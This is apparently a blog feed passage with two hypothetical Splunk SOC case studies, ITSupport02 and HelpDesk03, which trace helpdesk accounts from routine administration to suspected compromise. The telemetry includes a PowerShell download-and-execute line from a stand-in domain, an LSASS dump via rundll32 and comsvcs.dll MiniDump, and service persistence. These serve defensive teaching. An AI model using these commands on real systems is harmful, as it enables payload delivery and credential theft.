<p>However, the investigation becomes substantially more suspicious once an external archive is downloaded directly to <code class="language-plaintext highlighter-rouge">CLIENT61</code>.</p>

<hr />

<h1 id="2-first-point-of-suspicion">2. First Point of Suspicion</h1>

<p>My first significant suspicion is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:44:51 — CLIENT61
4104

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>The command itself is not malicious.</p>

<p>However, the <strong>context</strong> makes it suspicious.</p>

<p>The sequence is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITSupport02
      ↓
CLIENT60
      ↓
AD computer discovery
      ↓
CLIENT61
      ↓
Domain Admin enumeration
</code></pre></div></div>

<p>A Helpdesk or IT support administrator could legitimately perform this type of discovery, so I would initially classify this as:</p>

<blockquote>
  <p><strong>Suspicious — requiring further investigation.</strong></p>
</blockquote>

<p>I would not declare an incident at this point.</p>

<p>The subsequent activity is what determines whether the suspicion develops into a confirmed security incident.</p>

<hr />

<h1 id="3-incident-declaration">3. Incident Declaration</h1>

<p>I would declare the incident at:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:09 — CLIENT61

supportsvc.exe
        ↓
185.220.101.44
        ↓
443
</code></pre></div></div>

<p>At this point, the telemetry shows a compelling attack sequence:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>External archive downloaded
        ↓
Archive extracted
        ↓
supportsvc.exe executed
        ↓
supportsvc.exe communicates externally
</code></pre></div></div>

<p>The situation becomes even more serious because the destination IP has reportedly been identified through threat intelligence as malicious infrastructure.</p>

<p>However, I would be precise in the report:</p>

<blockquote>
  <p>The malicious reputation of the IP is a strong corroborating indicator, but the strongest evidence comes from the <strong>entire correlated sequence</strong>, rather than the IP reputation alone.</p>
</blockquote>

<p>I would then escalate immediately when the service persistence and LSASS dump appear.</p>

<p>In particular:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:46
7045
WindowsSupport
</code></pre></div></div>

<p>followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:48:20
rundll32.exe
comsvcs.dll, MiniDump
</code></pre></div></div>

<p>provides extremely strong evidence of malicious post-compromise activity.</p>

<hr />

<h1 id="4-is-itsupport02--client61-automatically-malicious">4. Is ITSupport02 → CLIENT61 Automatically Malicious?</h1>

<p><strong>No.</strong></p>

<p>This is an important distinction.</p>

<p>The following sequence is entirely capable of representing legitimate IT administration:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT60
    ↓
PowerShell
    ↓
Enter-PSSession CLIENT61
    ↓
4624 Type 3
    ↓
Get-Service
</code></pre></div></div>

<p>IT support personnel commonly use remote PowerShell sessions to:</p>

<ul>
  <li>Troubleshoot systems</li>
  <li>Inspect services</li>
  <li>Review running processes</li>
  <li>Install software</li>
  <li>Perform maintenance</li>
  <li>Respond to support requests</li>
</ul>

<p>Therefore, I would not classify the remote session itself as malicious.</p>

<p>The risk changes because the activity subsequently progresses from administration into:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AD privileged-account discovery
        ↓
External download
        ↓
Payload execution
        ↓
External communication
        ↓
Service persistence
        ↓
LSASS memory dumping
</code></pre></div></div>

<p>That progression is inconsistent with ordinary troubleshooting unless there is compelling organizational evidence explaining every step.</p>

<hr />

<h1 id="5-reconstructed-attack-chain">5. Reconstructed Attack Chain</h1>

<p>The complete sequence can be reconstructed as follows:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITSupport02
      ↓
CLIENT60
      ↓
Interactive Logon
4624 Type 2
      ↓
Get-Service
Get-Process
      ↓
Get-ADComputer -Filter *
      ↓
PowerShell Remoting
Enter-PSSession CLIENT61
      ↓
CLIENT61
4624 Type 3
      ↓
Get-Service
      ↓
Get-ADGroupMember "Domain Admins"
      ↓
DC01
4769
CIFS/FILESERVER02
      ↓
FILESERVER02
4624 Type 3
      ↓
DeploymentPackages.zip
ReadData
      ↓
CLIENT61
Invoke-WebRequest
support.zip
      ↓
C:\ProgramData\support.zip
      ↓
7z.exe
      ↓
supportsvc.exe
      ↓
185.220.101.44:443
      ↓
WindowsSupport Service
7045
      ↓
LSASS Memory Dump
      ↓
C:\ProgramData\lsass.dmp
</code></pre></div></div>

<p>The attack progression can therefore be interpreted as:</p>

<h3 id="stage-1--discovery">Stage 1 — Discovery</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-Service
Get-Process
Get-ADComputer
Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<h3 id="stage-2--remote-access">Stage 2 — Remote Access</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT60
    ↓
CLIENT61
</code></pre></div></div>

<h3 id="stage-3--payload-delivery">Stage 3 — Payload Delivery</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-WebRequest
        ↓
support.zip
</code></pre></div></div>

<h3 id="stage-4--execution">Stage 4 — Execution</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>7z.exe
    ↓
supportsvc.exe
</code></pre></div></div>

<h3 id="stage-5--command-and-control">Stage 5 — Command and Control</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>supportsvc.exe
    ↓
185.220.101.44:443
</code></pre></div></div>

<h3 id="stage-6--persistence">Stage 6 — Persistence</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc.exe create WindowsSupport
        ↓
7045
        ↓
supportsvc.exe
</code></pre></div></div>

<h3 id="stage-7--credential-access">Stage 7 — Credential Access</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rundll32.exe
        ↓
comsvcs.dll
        ↓
LSASS
        ↓
lsass.dmp
</code></pre></div></div>

<hr />

<h1 id="6-primary-and-potentially-affected-hosts">6. Primary and Potentially Affected Hosts</h1>

<h2 id="primary-affected-host--client61">Primary affected host — CLIENT61</h2>

<p><code class="language-plaintext highlighter-rouge">CLIENT61</code> is the primary affected host because it contains the strongest evidence of compromise:</p>

<ul>
  <li>Payload download</li>
  <li>Archive extraction</li>
  <li>Suspicious executable execution</li>
  <li>External network communication</li>
  <li>Service creation</li>
  <li>LSASS memory dumping</li>
</ul>

<p>This host should receive immediate containment priority.</p>

<h2 id="potentially-affected--client60">Potentially affected — CLIENT60</h2>

<p><code class="language-plaintext highlighter-rouge">CLIENT60</code> is potentially affected because:</p>

<ul>
  <li>It is the origin of the remote session.</li>
  <li><code class="language-plaintext highlighter-rouge">ITSupport02</code> authenticated interactively there.</li>
  <li>The account performed the initial discovery.</li>
</ul>

<p>However, the available telemetry does <strong>not</strong> prove that <code class="language-plaintext highlighter-rouge">CLIENT60</code> itself is compromised.</p>

<h2 id="potentially-affected--fileserver02">Potentially affected — FILESERVER02</h2>

<p><code class="language-plaintext highlighter-rouge">FILESERVER02</code> is also in scope because <code class="language-plaintext highlighter-rouge">ITSupport02</code> accessed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\\FILESERVER02\IT\DeploymentPackages.zip
</code></pre></div></div>

<p>The current evidence only shows <code class="language-plaintext highlighter-rouge">ReadData</code>.</p>

<p>There is not enough evidence to conclude that the server itself is compromised.</p>

<h2 id="dc01">DC01</h2>

<p><code class="language-plaintext highlighter-rouge">DC01</code> is an important investigative system because it records the Kerberos service-ticket activity, but the provided telemetry does not demonstrate compromise of the domain controller.</p>

<hr />

<h1 id="7-first-splunk-search">7. First Splunk Search</h1>

<p>I would begin by searching around the suspicious account and the known indicators:</p>

<pre><code class="language-spl">index=wineventlog OR index=sysmon
("ITSupport02" OR "supportsvc.exe" OR "185.220.101.44")
| table _time host EventCode Account_Name User Image CommandLine ParentImage DestinationIp DestinationPort
| sort _time
</code></pre>

<p>The objective is to establish the broader activity surrounding the account, endpoint, payload, and network destination.</p>

<p>I would then narrow the search around <code class="language-plaintext highlighter-rouge">CLIENT61</code>:</p>

<pre><code class="language-spl">index=wineventlog OR index=sysmon
host=CLIENT61
earliest=-2h latest=+2h
| table _time EventCode Image ParentImage CommandLine User DestinationIp DestinationPort
| sort _time
</code></pre>

<p>This would help establish what happened before and after the observed attack chain.</p>

<hr />

<h1 id="8-identifiers-for-reconstructing-the-process-chain">8. Identifiers for Reconstructing the Process Chain</h1>

<p>The primary correlation identifiers I would use are:</p>

<h3 id="logonguid">LogonGUID</h3>

<p>Useful for answering:</p>

<blockquote>
  <p>Which activity belongs to the same authentication session?</p>
</blockquote>

<h3 id="processguid">ProcessGUID</h3>

<p>Useful for answering:</p>

<blockquote>
  <p>Which process generated or spawned this activity?</p>
</blockquote>

<h3 id="account">Account</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITSupport02
</code></pre></div></div>

<p>Useful for tracking authentication and activity across hosts.</p>

<h3 id="source-and-destination-hosts">Source and destination hosts</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT60
      ↓
CLIENT61
      ↓
FILESERVER02
</code></pre></div></div>

<p>Useful for reconstructing movement through the environment.</p>

<h3 id="time">Time</h3>

<p>Timeline correlation is critical because the events occur only seconds apart.</p>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:46:08  Download
08:46:19  File creation
08:46:51  Extraction
08:47:04  Execution
08:47:09  Network connection
08:47:31  Service creation
08:47:46  Service installation
08:48:20  LSASS dump
</code></pre></div></div>

<p>That temporal relationship is itself a major investigative signal.</p>

<hr />

<h1 id="9-additional-telemetry">9. Additional Telemetry</h1>

<p>I would immediately investigate:</p>

<h3 id="authentication">Authentication</h3>

<p><strong>4624 / 4625</strong></p>

<p>To determine whether <code class="language-plaintext highlighter-rouge">ITSupport02</code> authenticated elsewhere unexpectedly.</p>

<h3 id="privileged-logons">Privileged Logons</h3>

<p><strong>4672</strong></p>

<p>To determine whether the account received special privileges on <code class="language-plaintext highlighter-rouge">CLIENT61</code> or other systems.</p>

<h3 id="process-creation">Process Creation</h3>

<p><strong>4688 / Sysmon Event ID 1</strong></p>

<p>To reconstruct:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
   ↓
7z.exe
   ↓
supportsvc.exe
   ↓
rundll32.exe
</code></pre></div></div>

<h3 id="network-connections">Network Connections</h3>

<p><strong>Sysmon Event ID 3</strong></p>

<p>To determine whether:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">CLIENT61</code> contacted other external destinations</li>
  <li><code class="language-plaintext highlighter-rouge">supportsvc.exe</code> communicated elsewhere</li>
  <li>Other processes communicated with the same infrastructure</li>
</ul>

<h3 id="dns">DNS</h3>

<p>DNS telemetry could establish how:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>updates-example.net
</code></pre></div></div>

<p>resolved and whether other endpoints contacted the same infrastructure.</p>

<h3 id="file-creation">File Creation</h3>

<p><strong>Sysmon Event ID 11</strong></p>

<p>I would investigate files created by:</p>

<ul>
  <li>PowerShell</li>
  <li><code class="language-plaintext highlighter-rouge">7z.exe</code></li>
  <li><code class="language-plaintext highlighter-rouge">supportsvc.exe</code></li>
  <li><code class="language-plaintext highlighter-rouge">rundll32.exe</code></li>
</ul>

<h3 id="service-creation">Service Creation</h3>

<p><strong>7045</strong></p>

<p>This is particularly important because:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>WindowsSupport
</code></pre></div></div>

<p>was created to execute the suspicious payload.</p>

<h3 id="edr">EDR</h3>

<p>EDR telemetry could provide the complete process tree, file reputation, hash, command line, network behavior, and potentially prevention/detection events.</p>

<hr />

<h1 id="10-containment">10. Containment</h1>

<p>My first containment action would be:</p>

<h2 id="isolate-client61">Isolate CLIENT61</h2>

<p>This is the highest-priority host because it has demonstrated:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Payload execution
        ↓
External communication
        ↓
Persistence
        ↓
Credential dumping
</code></pre></div></div>

<p>Network isolation limits the attacker’s ability to:</p>

<ul>
  <li>Establish further command and control</li>
  <li>Move laterally</li>
  <li>Access additional systems</li>
  <li>Reuse stolen credentials</li>
</ul>

<p>I would then investigate and potentially disable or restrict <code class="language-plaintext highlighter-rouge">ITSupport02</code>, particularly if evidence indicates credential compromise.</p>

<p>I would also:</p>

<ol>
  <li>Revoke active sessions.</li>
  <li>Reset the account credentials.</li>
  <li>Investigate other systems accessed by the account.</li>
  <li>Preserve relevant forensic evidence.</li>
  <li>Investigate <code class="language-plaintext highlighter-rouge">CLIENT60</code>.</li>
  <li>Review <code class="language-plaintext highlighter-rouge">FILESERVER02</code> access.</li>
  <li>Hunt for the malicious IP and payload hash across the environment.</li>
</ol>

<p>I would avoid immediately wiping the host because preservation of evidence is important for understanding the compromise.</p>

<hr />

<h1 id="11-what-could-prove-this-was-legitimate-it-administration">11. What Could Prove This Was Legitimate IT Administration?</h1>

<p>This is where the investigation needs to remain objective.</p>

<p>Evidence supporting legitimate activity could include:</p>

<h3 id="it-change--service-ticket">IT Change / Service Ticket</h3>

<p>A ticket explicitly authorizing:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITSupport02
→ CLIENT61
→ software installation/update
</code></pre></div></div>

<p>would provide important context.</p>

<h3 id="approved-software">Approved Software</h3>

<p>If <code class="language-plaintext highlighter-rouge">support.zip</code> and <code class="language-plaintext highlighter-rouge">supportsvc.exe</code> belong to an approved IT support application, suspicion would decrease substantially.</p>

<h3 id="known-good-hash">Known-Good Hash</h3>

<p>The SHA256 hash of:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>supportsvc.exe
</code></pre></div></div>

<p>could be compared against the organization’s approved software inventory.</p>

<h3 id="digital-signature">Digital Signature</h3>

<p>A valid signature from the expected vendor would provide additional evidence.</p>

<h3 id="approved-infrastructure">Approved Infrastructure</h3>

<p>The destination:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>185.220.101.44:443
</code></pre></div></div>

<p>would need to be verified against known corporate infrastructure.</p>

<p>However, there is an important limitation:</p>

<blockquote>
  <p><strong>If the destination is independently confirmed to be malicious infrastructure and <code class="language-plaintext highlighter-rouge">supportsvc.exe</code> is also confirmed malicious, a legitimate IT ticket would not make the overall sequence benign.</strong></p>
</blockquote>

<p>It could instead indicate:</p>

<ul>
  <li>An abused legitimate account</li>
  <li>A compromised IT workstation</li>
  <li>A malicious package disguised as legitimate software</li>
  <li>An attacker operating through legitimate administrative procedures</li>
</ul>

<p>This is why validation must combine <strong>business context + endpoint evidence + network evidence + threat intelligence</strong>.</p>

<hr />

<h1 id="final-soc-assessment">Final SOC Assessment</h1>

<p>The investigation begins with activity that could reasonably belong to an IT administrator:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ITSupport02
     ↓
CLIENT60
     ↓
System discovery
     ↓
AD computer discovery
     ↓
PowerShell Remoting
     ↓
CLIENT61
</code></pre></div></div>

<p>The first meaningful suspicion arises when the account enumerates:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>However, this remains <strong>suspicious rather than confirmed malicious</strong>.</p>

<p>The investigation changes dramatically when:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-WebRequest
       ↓
support.zip
       ↓
supportsvc.exe
       ↓
185.220.101.44:443
       ↓
WindowsSupport service
       ↓
LSASS memory dump
</code></pre></div></div>

<p>appears within a short time window.</p>

<p>At that point, the telemetry is no longer consistent with ordinary Helpdesk administration without substantial additional evidence.</p>

<h2 id="key-lesson">Key Lesson</h2>

<p>The most important lesson from this exercise is that <strong>SOC analysts should not declare an incident simply because an administrator performs administrative-looking actions</strong>.</p>

<p>Instead, the analyst should continuously ask:</p>

<blockquote>
  <p><strong>Does the activity make sense for this account, this host, this time, and this business function?</strong></p>
</blockquote>

<p>In this case, the answer changes as the investigation progresses.</p>

<p>The early activity may be legitimate.</p>

<p>The later correlated behavior provides strong evidence of compromise.</p>

<hr />

<h2 id="skills-practiced">Skills Practiced</h2>

<p><code class="language-plaintext highlighter-rouge">Splunk</code> · <code class="language-plaintext highlighter-rouge">SPL</code> · <code class="language-plaintext highlighter-rouge">Windows Event Logs</code> · <code class="language-plaintext highlighter-rouge">PowerShell</code> · <code class="language-plaintext highlighter-rouge">Sysmon</code> · <code class="language-plaintext highlighter-rouge">Active Directory</code> · <code class="language-plaintext highlighter-rouge">Kerberos</code> · <code class="language-plaintext highlighter-rouge">Process Correlation</code> · <code class="language-plaintext highlighter-rouge">Network Analysis</code> · <code class="language-plaintext highlighter-rouge">Threat Hunting</code> · <code class="language-plaintext highlighter-rouge">Persistence Detection</code> · <code class="language-plaintext highlighter-rouge">Credential Access</code> · <code class="language-plaintext highlighter-rouge">Incident Response</code></p>

<hr />

<h2 id="author">Author</h2>

<p><strong>Precious Anyanwu</strong></p>

<table>
  <tbody>
    <tr>
      <td>Cybersecurity</td>
      <td>SOC Analysis</td>
      <td>Cloud Security</td>
      <td>Threat Detection</td>
    </tr>
  </tbody>
</table>]]></content><author><name>Precious Cyber6ixxx</name></author><summary type="html"><![CDATA[Splunk SOC Investigation — ITSupport02: From Legitimate Administration to Confirmed Compromise]]></summary></entry><entry><title type="html">Soc Investigation Helpdesk03 Legitimate Administration Vs Malicious Activity</title><link href="/2026/08/12/SOC-Investigation-HelpDesk03-Legitimate-Administration-vs-Malicious-Activity.html" rel="alternate" type="text/html" title="Soc Investigation Helpdesk03 Legitimate Administration Vs Malicious Activity" /><published>2026-08-12T00:00:00+00:00</published><updated>2026-08-12T00:00:00+00:00</updated><id>/2026/08/12/SOC-Investigation-HelpDesk03-Legitimate-Administration-vs-Malicious-Activity</id><content type="html" xml:base="/2026/08/12/SOC-Investigation-HelpDesk03-Legitimate-Administration-vs-Malicious-Activity.html"><![CDATA[<h1 id="splunk-soc-investigation-case-study-helpdesk03--legitimate-administration-or-compromise">Splunk SOC Investigation Case Study: HelpDesk03 — Legitimate Administration or Compromise?</h1>

<h2 id="overview">Overview</h2>

<p>This case study documents a hypothetical SOC investigation designed to test the distinction between <strong>legitimate IT administration and potentially malicious activity</strong>.</p>

<p>The investigation follows the activity of <code class="language-plaintext highlighter-rouge">HelpDesk03</code> across <code class="language-plaintext highlighter-rouge">CLIENT51</code>, <code class="language-plaintext highlighter-rouge">CLIENT50</code>, <code class="language-plaintext highlighter-rouge">DC01</code>, and <code class="language-plaintext highlighter-rouge">FILESERVER01</code>. The central challenge is that the early activity is consistent with normal Helpdesk responsibilities, while later telemetry introduces indicators that could represent malware execution and command-and-control activity.</p>

<p>The investigation demonstrates an important SOC principle:</p>

<blockquote>
  <p><strong>Suspicious activity should be evaluated in context rather than judged from a single event.</strong></p>
</blockquote>

<hr />

<h2 id="investigation-environment">Investigation Environment</h2>

<table>
  <thead>
    <tr>
      <th>Host</th>
      <th>Role</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">CLIENT51</code></td>
      <td>Helpdesk workstation</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">CLIENT50</code></td>
      <td>User workstation</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">DC01</code></td>
      <td>Domain Controller</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">FILESERVER01</code></td>
      <td>Finance/IT file server</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">HelpDesk03</code></td>
      <td>Helpdesk account under investigation</td>
    </tr>
  </tbody>
</table>

<hr />

<h1 id="telemetry-under-investigation">Telemetry Under Investigation</h1>

<p>The following telemetry represents the complete evidence available to the analyst.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 1 — 10:21:04 — CLIENT51

4624

Account: HelpDesk03
Logon Type: 2
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 2 — 10:21:18 — CLIENT51

4104

Get-ADComputer -Filter *
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 3 — 10:21:25 — CLIENT51

4104

Get-Service
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 4 — 10:22:01 — CLIENT51

4688

powershell.exe

Command:
Enter-PSSession CLIENT50
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 5 — 10:22:03 — CLIENT50

4624

Account: HelpDesk03
Logon Type: 3
Source: CLIENT51
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 6 — 10:22:11 — CLIENT50

4104

Get-Process
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 7 — 10:22:19 — CLIENT50

4104

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 8 — 10:22:44 — DC01

4769

Account: HelpDesk03

Service:
cifs/FILESERVER01
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 9 — 10:23:02 — FILESERVER01

4624

Account: HelpDesk03
Logon Type: 3
Source: CLIENT50
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 10 — 10:23:15 — FILESERVER01

4663

Object:
\\FILESERVER01\IT\SoftwareInventory.xlsx

Access:
ReadData
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 11 — 10:23:42 — CLIENT50

4104

Invoke-WebRequest https://updates-example.net/inventory.zip -OutFile C:\ProgramData\inventory.zip
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 12 — 10:23:48 — CLIENT50

Sysmon 11

File Created:
C:\ProgramData\inventory.zip
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 13 — 10:24:10 — CLIENT50

4688

inventory.exe

Parent:
powershell.exe
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 14 — 10:24:12 — CLIENT50

Sysmon 3

inventory.exe
↓
10.10.20.50
↓
443
</code></pre></div></div>

<hr />

<h1 id="1-where-does-legitimate-activity-end">1. Where Does Legitimate Activity End?</h1>

<p>My assessment is that the last activity that can reasonably be considered potentially legitimate is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 10 — 10:23:15

FILESERVER01
4663

\\FILESERVER01\IT\SoftwareInventory.xlsx

ReadData
</code></pre></div></div>

<p>The preceding activity has a plausible Helpdesk explanation.</p>

<p><code class="language-plaintext highlighter-rouge">HelpDesk03</code> logs onto <code class="language-plaintext highlighter-rouge">CLIENT51</code>, performs system and Active Directory discovery, establishes a PowerShell remoting session to <code class="language-plaintext highlighter-rouge">CLIENT50</code>, and subsequently accesses an IT software inventory document.</p>

<p>A Helpdesk technician could legitimately perform these actions while troubleshooting a workstation or conducting software inventory.</p>

<p>The important distinction is that <strong>the activity is unusual enough to investigate, but not inherently malicious</strong>.</p>

<hr />

<h1 id="2-first-point-of-suspicion">2. First Point of Suspicion</h1>

<p>The first significant suspicion occurs at:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 11 — 10:23:42

Invoke-WebRequest
https://updates-example.net/inventory.zip

-OutFile C:\ProgramData\inventory.zip
</code></pre></div></div>

<p>The command becomes concerning because the investigation has moved from administrative activity to <strong>retrieving an external file and writing it to the endpoint</strong>.</p>

<p>Several contextual indicators increase the risk:</p>

<ul>
  <li>PowerShell is being used to download an external archive.</li>
  <li>The destination is an unfamiliar external domain.</li>
  <li>The file is written to <code class="language-plaintext highlighter-rouge">C:\ProgramData</code>.</li>
  <li>The download occurs immediately after administrative discovery and remote access activity.</li>
  <li>The downloaded file is subsequently executed.</li>
</ul>

<p>However, I would still avoid immediately declaring the file malicious.</p>

<p>Legitimate IT management software can download packages from external infrastructure.</p>

<p>Therefore:</p>

<p><strong>Event 11 = Suspicious</strong></p>

<p>rather than automatically:</p>

<p><strong>Event 11 = Confirmed compromise.</strong></p>

<hr />

<h1 id="3-escalation-point">3. Escalation Point</h1>

<p>My escalation point would be:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Event 14 — 10:24:12

Sysmon Event 3

inventory.exe
↓
10.10.20.50
↓
443
</code></pre></div></div>

<p>At this stage, the evidence is significantly stronger.</p>

<p>The sequence is now:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
   ↓
External download
   ↓
inventory.zip created
   ↓
inventory.exe executed
   ↓
inventory.exe establishes outbound connection
</code></pre></div></div>

<p>An executable downloaded moments earlier from an external source is now communicating externally over HTTPS.</p>

<p>This does not prove maliciousness by itself, but the <strong>combined telemetry establishes a sufficiently strong security concern to escalate for immediate investigation</strong>.</p>

<p>I would classify the situation as:</p>

<blockquote>
  <p><strong>Confirmed security incident / high-priority security investigation pending validation of the executable.</strong></p>
</blockquote>

<hr />

<h1 id="4-is-helpdesk03-lateral-movement-automatically-malicious">4. Is HelpDesk03 Lateral Movement Automatically Malicious?</h1>

<p>No.</p>

<p>The sequence:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT51
   ↓
PowerShell
   ↓
Enter-PSSession CLIENT50
   ↓
CLIENT50 Type 3 logon
</code></pre></div></div>

<p>is consistent with legitimate remote administration.</p>

<p>Helpdesk personnel may use PowerShell Remoting to:</p>

<ul>
  <li>Troubleshoot endpoints</li>
  <li>Inspect services</li>
  <li>Investigate running processes</li>
  <li>Install or update software</li>
  <li>Perform system maintenance</li>
  <li>Respond to user support requests</li>
</ul>

<p>Therefore, the presence of <code class="language-plaintext highlighter-rouge">Enter-PSSession</code> and a Type 3 authentication should not automatically be classified as malicious lateral movement.</p>

<p>The correct SOC approach is to ask:</p>

<blockquote>
  <p><strong>Was HelpDesk03 authorized to administer CLIENT50 at this time, and does the subsequent activity match the expected task?</strong></p>
</blockquote>

<p>The later download and execution activity is what changes the risk assessment.</p>

<hr />

<h1 id="5-understanding-event-id-4769">5. Understanding Event ID 4769</h1>

<p>The following event appears on <code class="language-plaintext highlighter-rouge">DC01</code>:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4769

Account:
HelpDesk03

Service:
cifs/FILESERVER01
</code></pre></div></div>

<p>Event ID 4769 represents a <strong>Kerberos service ticket request</strong>.</p>

<p>Here, <code class="language-plaintext highlighter-rouge">HelpDesk03</code> requested a service ticket for the CIFS service on <code class="language-plaintext highlighter-rouge">FILESERVER01</code>.</p>

<p>CIFS is commonly associated with Windows file-sharing services.</p>

<p>This correlates with the subsequent:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FILESERVER01
4624
HelpDesk03
Logon Type 3
Source: CLIENT50
</code></pre></div></div>

<p>and then:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4663
\\FILESERVER01\IT\SoftwareInventory.xlsx
ReadData
</code></pre></div></div>

<p>The sequence therefore provides useful authentication and resource-access correlation:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk03
     ↓
DC01
     ↓
Kerberos service ticket for CIFS
     ↓
FILESERVER01
     ↓
Network logon
     ↓
SoftwareInventory.xlsx
</code></pre></div></div>

<hr />

<h1 id="6-reconstructed-telemetry-chain">6. Reconstructed Telemetry Chain</h1>

<p>The investigation can be reconstructed as follows:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk03
    │
    ▼
CLIENT51
Interactive Logon
4624 Type 2
    │
    ▼
PowerShell
    │
    ├── Get-ADComputer -Filter *
    │
    └── Get-Service
    │
    ▼
Enter-PSSession CLIENT50
    │
    ▼
CLIENT50
4624 Type 3
Source: CLIENT51
    │
    ├── Get-Process
    │
    └── Get-ADGroupMember "Domain Admins"
    │
    ▼
DC01
4769
CIFS/FILESERVER01
    │
    ▼
FILESERVER01
4624 Type 3
    │
    ▼
SoftwareInventory.xlsx
ReadData
    │
    ▼
CLIENT50
Invoke-WebRequest
    │
    ▼
inventory.zip
    │
    ▼
inventory.exe
    │
    ▼
Outbound HTTPS
10.10.20.50:443
</code></pre></div></div>

<p>This chain demonstrates why the investigation cannot be based on individual events.</p>

<p>The early portion has a credible administrative explanation.</p>

<p>The later portion creates a substantially different risk profile.</p>

<hr />

<h1 id="7-primary-affected-host">7. Primary Affected Host</h1>

<p>My primary affected host is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT50
</code></pre></div></div>

<p>This is where the most concerning activity occurs.</p>

<p><code class="language-plaintext highlighter-rouge">CLIENT50</code>:</p>

<ul>
  <li>Received the remote PowerShell session</li>
  <li>Performed AD enumeration</li>
  <li>Downloaded the external archive</li>
  <li>Created <code class="language-plaintext highlighter-rouge">inventory.zip</code></li>
  <li>Executed <code class="language-plaintext highlighter-rouge">inventory.exe</code></li>
  <li>Established an outbound connection</li>
</ul>

<p>Therefore, <code class="language-plaintext highlighter-rouge">CLIENT50</code> should receive immediate investigative and containment priority.</p>

